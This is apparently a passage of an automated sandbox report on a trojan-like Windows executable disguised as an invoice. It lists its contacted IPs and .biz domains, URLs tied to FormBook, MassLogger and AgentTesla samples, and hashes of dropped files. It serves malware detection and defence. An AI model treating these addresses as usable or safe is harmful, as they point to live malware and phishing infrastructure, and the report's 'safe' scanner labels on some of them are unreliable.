          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\msdtc.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\FXSSVC.exe | 100% | Joe Sandbox ML |
          C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          http://54.244.188.177/G | 100% | Avira URL Cloud | phishing
          http://18.141.10.107/Oeh | 0% | Avira URL Cloud | safe
          http://54.244.188.177/wtafuenc | 0% | Avira URL Cloud | safe
          http://54.244.188.177/f | 100% | Avira URL Cloud | phishing
          http://54.244.188.177/9N | 0% | Avira URL Cloud | safe
          http://18.141.10.107/b | 0% | Avira URL Cloud | safe
          http://54.244.188.177/wtafuencqgdxd | 0% | Avira URL Cloud | safe
          http://18.141.10.107/amnlbtdctisruxvs | 0% | Avira URL Cloud | safe
          http://54.244.188.177/wtafuencqgdxds | 0% | Avira URL Cloud | safe
          http://54.244.188.177/5 | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cvgrf.biz | 54.244.188.177 | true | false | | high
          ssbzmoy.biz | 18.141.10.107 | true | false | | high
          fwiwk.biz | 172.234.222.138 | true | false | | high
          pywolwnvd.biz | 54.244.188.177 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          http://ssbzmoy.biz/wibawwpi | false | | high
          http://vcddkls.biz/x | false | | high
          http://pywolwnvd.biz/trlioiljoillllwq | false | | high
          http://knjghuig.biz/btfx | false | | high
          http://ssbzmoy.biz/amnlbtdctisruxvs | false | | high
          http://cvgrf.biz/mddjrljmh | false | | high
          http://pywolwnvd.biz/wtafuencqgdxd | false | | high
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://54.244.188.177/5 | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107/b | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | elevation_service.exe.0.dr | false | | high
          http://18.141.10.107/Oeh | INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://18.141.10.107/amnlbtdctisruxvs | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://54.244.188.177/G | INV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          http://54.244.188.177/f | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
          http://54.244.188.177/wtafuencqgdxds | INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://ssbzmoy.biz/SgL | INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://54.244.188.177/wtafuencqgdxd | INV_NE_02_2034388.exe, 00000000.00000003.1292338634.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1286250862.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296335740.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1288005450.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287564151.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1297197458.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307257706.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285212644.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296483664.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1301284711.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1284963561.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296799474.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285623478.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://54.244.188.177/9N | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | elevation_service.exe.0.dr | false | | high
          http://18.141.10.107/ | INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | false | | high
          http://54.244.188.177/wtafuenc | INV_NE_02_2034388.exe, 00000000.00000003.1313746685.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1343295812.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          54.244.188.177 | cvgrf.biz | United States | 16509 | AMAZON-02US | false
          18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1574347
                                        Start date and time:2024-12-13 08:56:45 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                        Number of new started drivers analysed:3
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:INV_NE_02_2034388.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.expl.evad.winEXE@9/14@7/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 65%
                                        • Number of executed functions: 61
                                        • Number of non-executed functions: 252
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                        • Excluded domains from analysis (whitelisted): przvgke.biz, zlenh.biz, otelrules.azureedge.net, slscr.update.microsoft.com, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, time.windows.com, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, ww99.przvgke.biz, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • VT rate limit hit for: INV_NE_02_2034388.exe
Time | Type | Description
02:57:44 | API Interceptor | 2x Sleep call for process: INV_NE_02_2034388.exe modified
04:21:33 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54.244.188.177 | Shipment Notification.exe | malicious | FormBook | cvgrf.biz/pm
54.244.188.177 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/yfypviummaqwyuq
54.244.188.177 | MA-DS-2024-03 URGENT.exe | malicious | FormBook | pywolwnvd.biz/usxsp
54.244.188.177 | Request for Quotation.exe | malicious | FormBook | cvgrf.biz/iropyruplkan
54.244.188.177 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/hfsfqfqbrwib
54.244.188.177 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | cvgrf.biz/npdqgsoqmq
54.244.188.177 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | cvgrf.biz/rtjcy
54.244.188.177 | OgkJOmobY7.exe | malicious | FormBook | pywolwnvd.biz/hemfkj
54.244.188.177 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | pywolwnvd.biz/nwqf
54.244.188.177 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | cvgrf.biz/yqmdwhskkjhif
18.141.10.107 | Shipment Notification.exe | malicious | FormBook | knjghuig.biz/hsyjdjsftfdjf
18.141.10.107 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | vcddkls.biz/lqpvpf
18.141.10.107 | Request for Quotation.exe | malicious | FormBook | vcddkls.biz/ytpebbldheutao
18.141.10.107 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | vcddkls.biz/ymdlhl
18.141.10.107 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | knjghuig.biz/jedofahyn
18.141.10.107 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | vcddkls.biz/gepvpveyhkiwwmj
18.141.10.107 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | vcddkls.biz/kf
18.141.10.107 | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | ssbzmoy.biz/j
18.141.10.107 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | ssbzmoy.biz/kokmvod
18.141.10.107 | invoice_96.73.exe | malicious | FormBook | acwjcqqv.biz/tgcwttfqletfhyq
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fwiwk.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 172.234.222.143
fwiwk.biz | Request for Quotation.exe | malicious | FormBook | 172.234.222.138
fwiwk.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 172.234.222.143
fwiwk.biz | invoice_96.73.exe | malicious | FormBook | 172.234.222.143
fwiwk.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 172.234.222.143
fwiwk.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.138
fwiwk.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.143
fwiwk.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
cvgrf.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
cvgrf.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
cvgrf.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 54.244.188.177
cvgrf.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
cvgrf.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
cvgrf.biz | invoice_96.73.exe | malicious | FormBook | 54.244.188.177
cvgrf.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
cvgrf.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
cvgrf.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
ssbzmoy.biz | Shipment Notification.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
ssbzmoy.biz | Request for Quotation.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
ssbzmoy.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | invoice_96.73.exe | malicious | FormBook | 18.141.10.107
pywolwnvd.biz | Shipment Notification.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
pywolwnvd.biz | MA-DS-2024-03 URGENT.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Request for Quotation.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
pywolwnvd.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | OgkJOmobY7.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | chos.exe | malicious | Unknown | 45.112.123.126
AMAZON-02US | sparc.nn.elf | malicious | Mirai, Okiru | 18.252.132.130
AMAZON-02US | arm.elf | malicious | Unknown | 34.249.145.219
AMAZON-02US | x86_32.nn.elf | malicious | Mirai, Okiru | 13.222.71.194
AMAZON-02US | http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450 | malicious | Unknown | 52.24.227.163
AMAZON-02US | x86_64.nn.elf | malicious | Mirai, Okiru | 18.242.255.3
AMAZON-02US | arm5.nn.elf | malicious | Mirai, Okiru | 44.228.127.176
AMAZON-02US | sh4.nn.elf | malicious | Mirai, Okiru | 3.251.85.156
AMAZON-02US | arm.nn.elf | malicious | Mirai, Okiru | 18.184.233.255
AMAZON-02US | mips.nn.elf | malicious | Mirai, Okiru | 18.194.49.4
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):1658880
                                        Entropy (8bit):4.312984062003007
                                        Encrypted:false
                                        SSDEEP:24576:jxGBcmlUsVg9N9JMlDlfjRiVuVsWt5MJMs:tGy+UMgFIDRRAubt5M
                                        MD5:4768582FEC7E07C429C532098BB3A67A
                                        SHA1:11ECD8AC35E2D91E8A2D776B0D9F59AB33092AC0
                                        SHA-256:4277157B276F8860465F731DE4C2A04B185F6C2D40C698738411C779B2BBA506
                                        SHA-512:7361D630E4A580E2A856B0A61D788EE8716914F31C897573198492DE4CD4A17083BC5DC456595754448EA96C3F0791EAF95C82C667FB879539EDD591DFFDA194
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):2354176
                                        Entropy (8bit):7.049187675199965
                                        Encrypted:false
                                        SSDEEP:49152:3hDdVrQ95RW0YEHyWQXE/09Val0GuMgFIDRRAubt5M:3hHYW+HyWKVUf
                                        MD5:F48DDCBA6A247532AFB4E29CAAD7C016
                                        SHA1:1CE7EB6458D849AF138CCDD55440D84DB7B5FAFB
                                        SHA-256:EE240B771106FFBDDDC058040D60F41283C814D39FA058F5D67AB9FE86CBAEF8
                                        SHA-512:76B43A0DCA9403EB6E79019C5D59B4BDCA7230C7CAF20DE504594B47BACFEDB298469662A7F41AD58223B299BC6C329B6CEF5CBEC4C9F2F196C9C02EE3DDA031
                                        Malicious:true
                                        Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3141
                                        Entropy (8bit):4.918707299392163
                                        Encrypted:false
                                        SSDEEP:24:l8+dw84r8j8G8n48Z8zRz8ZWtF8o8ZWmIF8+18I8P8Bu8X8J8ZWqF8ov85x8ZWlb:5MeRxpmysKKvBfqEeznQD
                                        MD5:1C27F101CBF893E2D8E9D42D21F439D4
                                        SHA1:6724FCAF7675AF20B3C924E41DD17E3602D5E7D9
                                        SHA-256:852009D0CAD8E070AA017F9C33CC3C93247603ABC012AC45C1CF2A8DD133D5E4
                                        SHA-512:8737664142DF55D739E8661CD5AA1D679944AD8312D1AA18E980583DD8A037195ECABD6A322C459A3303FE859913A93F58EA8BCDB427485CA3C4E0FE949408C4
                                        Malicious:false
                                        Reputation:low
                                        Preview:2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-13 02:57:46-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-13 02:57:46-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-13 02:57:46-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-13 02:57:4
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1725440
                                        Entropy (8bit):4.4125006099097694
                                        Encrypted:false
                                        SSDEEP:24576:XQVTZu0JUsVg9N9JMlDlfjRiVuVsWt5MJMs:gVTZuTMgFIDRRAubt5M
                                        MD5:1B5C1CB5B173A3E9004CEBAB7FD31E75
                                        SHA1:578195205A8DD08A4BF42CB3E2B0B304E08D0D73
                                        SHA-256:E6E798122CE373B8377E6DD941EE24D1757B3F00FA5C8C63E3158D86EA5B28A6
                                        SHA-512:62A0E3F1C32B988C0F948BC591F4C24485C55101C0A505555C7BE44EC9244D0EDC3B1F1FB3ECB64A91A746549CB532300A558168AF7165A5BA608551BF24B4E3
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):2370560
                                        Entropy (8bit):7.031526152160088
                                        Encrypted:false
                                        SSDEEP:49152:RAMsOu3JfCIGnZuTodRFYKBrFxbWpcMgFIDRRAubt5M:RAMa38ZuTS3Uf
                                        MD5:C61DF72ECB866868D4B381421F663F20
                                        SHA1:F1E66CA647E1180982465F6C2366F098E75823FA
                                        SHA-256:37AAC981227D3A3491E7789285ED15105D8C17D63DB7DA0124E32984F1CAA533
                                        SHA-512:80682A3FE04BD5DC17C25BFD4CF9C3B5F69575518EF81612AFA3BB0624954DCC0E87A6056F203FCB85443D768EFB27DACDD24E31E1734E244FADA9CDCB577552
                                        Malicious:true
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.995710526450922
                                        Encrypted:true
                                        SSDEEP:6144:t/rGfEQFP6TamMuTGhPp2jiiCU8iGg2svL2oL7ke+5PELQ:tzGM8P6vM2LCIGg2ZoLAV
                                        MD5:3AD54B7B8886FA858714144BDAEE1CD1
                                        SHA1:B6395960A7F28E75D7878B55E3068F6164D96E07
                                        SHA-256:6E84671DF72B3301C175BBA07A83631A0B0D4BE8404009DB84020AC8DA9773B3
                                        SHA-512:CC2D9F97AFBFED1632D0D4DFC872B62B6361CFA2AC93C1741E84263B1E3391826A1C2AFA502D5A132AD1341140DA92C11455150C354D42FD85B20CA6A5C7C327
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):288768
                                        Entropy (8bit):7.995710526450922
                                        Encrypted:true
                                        SSDEEP:6144:t/rGfEQFP6TamMuTGhPp2jiiCU8iGg2svL2oL7ke+5PELQ:tzGM8P6vM2LCIGg2ZoLAV
                                        MD5:3AD54B7B8886FA858714144BDAEE1CD1
                                        SHA1:B6395960A7F28E75D7878B55E3068F6164D96E07
                                        SHA-256:6E84671DF72B3301C175BBA07A83631A0B0D4BE8404009DB84020AC8DA9773B3
                                        SHA-512:CC2D9F97AFBFED1632D0D4DFC872B62B6361CFA2AC93C1741E84263B1E3391826A1C2AFA502D5A132AD1341140DA92C11455150C354D42FD85B20CA6A5C7C327
                                        Malicious:false
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12320
                                        Entropy (8bit):7.985533036289979
                                        Encrypted:false
                                        SSDEEP:384:jvPLIRNPIEyYUS9l7qZYeiVDWsc2seouw4iT1Yy:7ERSA7qZ9iVDZc2DdwR
                                        MD5:4CF398F322DA2FC3622B9FF1333F66FF
                                        SHA1:4D9F71ED4859423C57A20D3F196B3E364D5BEA20
                                        SHA-256:00D8CA784E4B543B037DE643F46D9A9E31AC0D8D9479389BD9BB91FA3C2D9C9B
                                        SHA-512:08040D40ECA6938BF26028BC773AF87DF47E1D7993A23D8F2F593A32913C9CA01773DB1E91DD3E06BE089C01A5F2F81ADE4C60F64E0325918F0B3DA87F2772D0
                                        Malicious:false
                                        Preview:..+.........S..t....P...U.Ee....(.D.'l.Y&.].a([.%.@R#..#m.&hjt...$|...*...@...?C...".l..p.3Ly.....f.ta..8`.%.`=.=.l...62.^....*:..Gpo2.q)i*?.1..YR".J....J.wx.(9..Q.).....E3.e.E..&...O.....R].......t.U^y|...;.x..7..[.0a..2/y4.4..G'...sK...I.......xq...9......$......!a.J.`..CZ.a.8..gQgf.....J.W.~i...~].O.&}.t:.j....P%M..s#mUKa.......[c.......Y/........L.9...oF..J~......,IT.Tx..o.......5.....R.k.....6.B..gz...M..{..G.|....g.Y...d.E..qL.B....,..s....cm....by....kH...........99...8.......\qH..(.TjV....XT..Q.1.x..'Q. >=#ll......B..d.~.0.S..C.....N..!;..;.K..6..0Q.....^!..... R.<.0.`TY.7.......J...Of7.C...$..8..8C.;.C...5..?.;......<.".?h.......ki.9...G..".&..B.Y.-".|=.Z..).l7.Nz..b..4.....T..W..a$...v.}.e9..t&Y...$::......U9.Oap....&..S=~....Y.....T.!-..s..n5..5....U....c...%.j.Q!T...._.b.i.....ae..Cw.........c.3.6.Cn...^....O...4..ZJ..&..$.|.............E..%.:M.u.......~..`..K....[......=//.......H.!KP..]..$i....G..~...TJ.=..$/...R..L...x._2p .
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1348608
                                        Entropy (8bit):7.251540682469764
                                        Encrypted:false
                                        SSDEEP:24576:IQW4qoNUgslKNX0Ip0MgHCpoMBOujsVg9N9JMlDlfjRiVuVsWt5MJMs:IQW9BKNX0IPgiKMBOujMgFIDRRAubt5M
                                        MD5:BAE30C5C71632F53795DE111E7ED6DC7
                                        SHA1:A0DB5102379087FC512F4B59CE535E7E1391801D
                                        SHA-256:39DBEF4B667217817579A86B31FF16F3B072A86C9CF1A64EB8EFD19639B1AB39
                                        SHA-512:1C74B11AB26FCF3E0FB7109C94B91919F35A6A78C04CEBF15A4DF6BB713F37CDFFC584C5E654C2844654A38FB147A95E9CE8A5AA0724BB1BF86B1879252B4421
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1592832
                                        Entropy (8bit):4.174807577471976
                                        Encrypted:false
                                        SSDEEP:24576:I2G7AbHjkGsVg9N9JMlDlfjRiVuVsWt5MJMs:I2G7AbHjdMgFIDRRAubt5M
                                        MD5:EF72E511E2DBB8EA505947340C908203
                                        SHA1:1F57A13B99C7C9C19ED3D6EA00A5F5488C30C7FB
                                        SHA-256:8DF02E1AE7BB8B6B4E02A8EB5E9AAFAD5FDEC5877D654825DB3D1789835852C0
                                        SHA-512:55392E3CC5D34E4D76D503002F86AC1881081C5030560F6D573654325787345E4688CFE3AD79BC72BD55F246AC67057C9D3A43EF7519854BE7C88ABCA15A0F95
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1242624
                                        Entropy (8bit):7.287652271182454
                                        Encrypted:false
                                        SSDEEP:24576:gkdpSI+K3S/GWei+qNv2wG3OsVg9N9JMlDlfjRiVuVsWt5MJMs:g6SIGGWei2wG3OMgFIDRRAubt5M
                                        MD5:CCD5F7B3E8C0B4733DD115FF88547F14
                                        SHA1:AC828EB290C3B315BD9DA53CF08EB7003AAB88B7
                                        SHA-256:5A7427E62563F40070CEBECFB77F386B78E2F229F1E3B9BA21855515EC42009A
                                        SHA-512:D122B70EF77F9F3AD79FCEC643BD0B3983BAD39392CB688C33FAFD2508AF1665EA5B000FF87C96637F1CA5FFD73BFD85D15E80130DA6BF907D7D15E1DF7D9E22
                                        Malicious:true
                                        Antivirus:
